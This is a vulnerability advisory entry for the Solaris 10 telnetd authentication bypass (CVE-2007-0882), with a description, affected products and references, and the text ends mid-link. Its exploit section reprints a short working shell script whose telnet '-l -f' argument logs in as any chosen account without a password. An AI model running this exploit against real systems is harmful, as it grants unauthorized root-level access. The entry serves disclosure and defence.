Sun Solaris Telnet Service Remote Authentication Bypass Vulnerability

Vulnerability ID: 1112202    Vulnerability type: Code injection
Published: 2007-02-11    Updated: 2007-11-05
CVE ID: CVE-2007-0882    CNNVD-ID: CNNVD-200702-224
Platform: Solaris    CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/3293
https://www.securityfocus.com/bid/22512
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-224
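|Vulnerability details
Solaris is a commercial UNIX operating system developed and maintained by Sun. The TELNET service in Solaris 10 has a flaw in how it handles malformed authentication data, which a remote attacker may exploit to bypass authentication and gain access. The Solaris 10 telnet daemon passes malformed parameters that a user may submit directly to the login process without checking them, and the login process consequently performs an unintended switch of user identity. This may allow a user to log in to the system without a password with the privileges of certain privileged users and gain full access to the system; if the system does not restrict where root may log in from, obtaining root access is also possible. This vulnerability is currently being actively exploited.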
|Exploit
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1

# milw0rm.com [2007-02-11]
|Affected products
Sun Solaris 10.0_x86
Sun Solaris 10.0
Nortel Networks Self-Service - Peri Application Rel 3.0
Nortel Networks Self-Service - CCSS7 0
Nortel Networks Media Processing Svr 500 Rel 3.0
|References

Source: US-CERT
Name: TA07-059A
Link: http://www.us-cert.gov/cas/techalerts/TA07-059A.html
Source: US-CERT
Name: VU#881872
Link: http://www.kb.cert.org/vuls/id/881872
Source: XF
Name: solaris-telnet-authentication-bypass(32434)
Link: http://xforce.iss.net/xforce/xfdb/32434
Source: SECTRACK
Name: 1017625
Link: http://www.securitytracker.com/id?1017625
Source: BID
Name: 22512
Link: http://www.securityfocus.com/bid/22512
Source: BUGTRAQ
Name: 20070214 RE: [Full-disclosure] Solaris telnet vulnberability - how many on your network?
Link: http://www.securityfocus.com/archive/1/archive/1/460103/100/100/threaded
Source: BUGTRAQ
Name: 20070214 Solaris telnet vuln solutions digest and network risks
Link: http://www.securityfocus.com/archive/1/archive/1/460086/100/100/threaded
Source: BUGTRAQ
Name: 20070213 Re: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability - how many on your network?
Link: http://www.securityfocus.com/archive/1/archive/1/459980/100/0/threaded
Source: BUGTRAQ
Name: 20070212 Re: [BLACKLIST] [Full-disclosure] Solaris telnet vulnberability - how many on your network?
Link: http://www.securityfocus.com/archiv